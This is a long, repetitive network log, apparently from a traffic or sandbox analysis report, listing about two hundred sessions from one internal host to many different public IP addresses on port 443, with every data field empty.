                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12032192.168.2.145412849.86.129.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12033192.168.2.143499225.168.245.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12034192.168.2.1433248160.251.242.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12035192.168.2.1448036197.224.223.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12036192.168.2.145158863.9.220.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12037192.168.2.145926074.80.156.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12038192.168.2.1436400192.95.145.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12039192.168.2.144769286.201.94.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12040192.168.2.1443470192.213.118.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12041192.168.2.1434856119.115.143.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12042192.168.2.145665817.34.242.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12043192.168.2.1439964130.39.29.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12044192.168.2.143890087.135.220.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12045192.168.2.1454226213.22.206.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12046192.168.2.1457528102.111.22.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12047192.168.2.1439680197.144.151.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12048192.168.2.144190213.134.67.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12049192.168.2.1452818111.154.162.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12050192.168.2.1446510109.98.142.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12051192.168.2.1452094134.47.62.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12052192.168.2.1452888186.248.74.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12053192.168.2.145750031.197.138.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12054192.168.2.1456330211.11.168.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12055192.168.2.1444414121.39.34.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12056192.168.2.1435032105.239.10.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12057192.168.2.1442116117.37.57.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12058192.168.2.1435750120.70.149.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12059192.168.2.1454766213.23.202.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12060192.168.2.143433684.228.118.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12061192.168.2.1445762197.100.173.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12062192.168.2.1450554187.154.240.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12063192.168.2.1444344151.50.155.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12064192.168.2.144230652.164.190.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12065192.168.2.1437226195.147.102.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12066192.168.2.1441760113.58.13.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12067192.168.2.14365029.8.252.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12068192.168.2.145616265.85.10.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12069192.168.2.1452874142.215.227.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12070192.168.2.145953819.114.179.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12071192.168.2.145741694.241.138.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12072192.168.2.1437782204.238.123.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12073192.168.2.1442294173.185.139.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12074192.168.2.1433202178.53.119.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12075192.168.2.1437826223.6.69.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12076192.168.2.1446310165.23.16.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12077192.168.2.1451618191.144.235.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12078192.168.2.1441802172.105.144.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12079192.168.2.1447024169.64.86.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12080192.168.2.1454330143.96.76.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12081192.168.2.145789234.42.172.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12082192.168.2.1439668163.174.100.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12083192.168.2.1452000212.158.198.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12084192.168.2.145139634.51.156.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12085192.168.2.14501205.80.113.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12086192.168.2.143658252.217.94.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12087192.168.2.143746459.135.173.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12088192.168.2.1458448203.181.249.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12089192.168.2.145896057.19.125.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12090192.168.2.143311646.124.30.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12091192.168.2.143709642.146.100.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12092192.168.2.144020019.59.57.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12093192.168.2.1441398148.95.212.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12094192.168.2.144930014.155.199.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12095192.168.2.1458314204.40.182.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12096192.168.2.143940072.70.136.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12097192.168.2.1443260179.198.107.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12098192.168.2.1458600173.198.164.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12099192.168.2.1457060198.230.4.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12100192.168.2.1448712128.150.114.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12101192.168.2.145444273.135.10.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12102192.168.2.144520051.122.107.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12103192.168.2.145468660.20.61.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12104192.168.2.1446526140.236.156.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12105192.168.2.14461481.123.45.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12106192.168.2.144062843.182.174.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12107192.168.2.1446622207.227.6.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12108192.168.2.1437840190.199.84.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12109192.168.2.145647241.228.5.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12110192.168.2.14463121.21.12.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12111192.168.2.143510218.83.105.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12112192.168.2.145104276.99.226.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12113192.168.2.1437376168.98.25.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12114192.168.2.1439146144.50.221.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12115192.168.2.1436900138.250.130.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12116192.168.2.1445654123.223.145.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12117192.168.2.144329849.158.2.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12118192.168.2.1445734111.108.203.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12119192.168.2.1446168194.0.89.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12120192.168.2.143408490.177.189.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12121192.168.2.1449402155.228.118.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12122192.168.2.1459382141.63.216.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12123192.168.2.145112647.125.203.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12124192.168.2.1452286106.21.60.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12125192.168.2.1452134117.102.166.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12126192.168.2.144162699.195.105.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12127192.168.2.1447918176.78.62.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12128192.168.2.1458534180.253.1.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12129192.168.2.143544253.244.26.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12130192.168.2.1439522213.204.91.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12131192.168.2.1441262104.237.82.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12132192.168.2.145338075.27.63.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12133192.168.2.146079679.150.138.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12134192.168.2.143598654.96.93.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12135192.168.2.145616075.1.128.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12136192.168.2.1434486216.169.244.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12137192.168.2.1438446125.46.211.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12138192.168.2.1455902108.232.114.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12139192.168.2.1433590156.121.85.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12140192.168.2.1449486141.2.237.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12141192.168.2.145522094.125.230.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12142192.168.2.143527023.164.61.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12143192.168.2.143913278.148.128.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12144192.168.2.1441682204.36.156.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12145192.168.2.146072871.118.165.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12146192.168.2.1433886119.131.185.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12147192.168.2.1439770158.245.97.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12148192.168.2.144786073.21.231.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12149192.168.2.144968441.252.62.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12150192.168.2.1447198201.95.224.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12151192.168.2.14518048.204.236.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12152192.168.2.1448114222.40.181.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12153192.168.2.1435924219.95.82.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12154192.168.2.1445852174.146.13.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12155192.168.2.145673638.40.49.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12156192.168.2.1451308117.248.129.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12157192.168.2.1453320193.111.152.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12158192.168.2.1439246156.140.30.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12159192.168.2.1436324172.91.53.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12160192.168.2.144594478.152.77.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12161192.168.2.1445534162.4.24.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12162192.168.2.145152850.153.3.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12163192.168.2.1447076125.159.181.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12164192.168.2.1439258108.15.188.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12165192.168.2.1441062122.236.236.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12166192.168.2.143921299.81.233.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12167192.168.2.1445178119.129.240.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12168192.168.2.1437212161.51.105.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12169192.168.2.144977449.200.90.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12170192.168.2.145695223.217.215.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12171192.168.2.143672883.138.251.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12172192.168.2.1441246189.114.69.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12173192.168.2.145638660.175.130.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12174192.168.2.144426219.31.58.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12175192.168.2.1446300219.175.237.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12176192.168.2.146000457.241.3.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12177192.168.2.1446886197.244.50.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12178192.168.2.145058681.147.164.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12179192.168.2.145370243.215.150.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12180192.168.2.1447504210.78.167.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12181192.168.2.1451692175.9.178.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12182192.168.2.145608279.244.175.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12183192.168.2.1455834199.239.41.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12184192.168.2.145834063.187.226.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12185192.168.2.14595964.196.142.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12186192.168.2.1442544133.43.206.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12187192.168.2.1434784101.255.223.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12188192.168.2.146015420.96.9.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12189192.168.2.1453700172.224.138.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12190192.168.2.144301220.110.220.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12191192.168.2.144117853.120.178.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192192.168.2.1437760204.130.237.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12193192.168.2.145844491.173.58.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12194192.168.2.1450762146.145.69.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12195192.168.2.1442346146.69.29.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12196192.168.2.145497098.178.75.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12197192.168.2.144243879.63.231.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12198192.168.2.1458874213.25.93.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12199192.168.2.1459486186.16.17.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12200192.168.2.1451638195.102.61.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12201192.168.2.1445642116.85.227.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12202192.168.2.1434248102.45.195.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12203192.168.2.1458606198.29.194.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12204192.168.2.1444706202.40.209.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12205192.168.2.1440008101.138.71.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12206192.168.2.144799634.171.51.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12207192.168.2.143750483.28.208.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12208192.168.2.145338887.16.217.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12209192.168.2.143941282.59.35.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12210192.168.2.1445220219.57.33.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12211192.168.2.1444694166.133.5.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12212192.168.2.1453922208.10.130.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12213192.168.2.1459680191.216.196.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12214192.168.2.1451264112.212.182.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12215192.168.2.1434918178.146.160.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12216192.168.2.145002837.138.60.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12217192.168.2.1450520187.105.100.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12218192.168.2.1455226115.66.38.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12219192.168.2.143657080.174.187.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12220192.168.2.1434704100.14.58.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12221192.168.2.144405627.154.138.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12222192.168.2.1455358158.90.200.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12223192.168.2.1441104125.219.158.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12224192.168.2.145895663.147.88.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12225192.168.2.1438004150.96.109.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12226192.168.2.1456586105.6.103.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12227192.168.2.1437190130.179.232.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12228192.168.2.1446282141.194.192.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12229192.168.2.145732044.203.38.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12230192.168.2.1447406210.55.24.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12231192.168.2.143282424.182.169.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12232192.168.2.143465289.185.109.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12233192.168.2.1454370112.44.225.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12234192.168.2.1458180203.208.120.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12235192.168.2.14394644.239.14.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12236192.168.2.1456970101.206.206.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12237192.168.2.1444348122.98.234.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12238192.168.2.1434340128.120.138.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12239192.168.2.1434186135.5.36.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12240192.168.2.1448460213.245.64.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12241192.168.2.1457436161.23.215.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12242192.168.2.1442400152.78.188.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12243192.168.2.1455862103.42.253.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
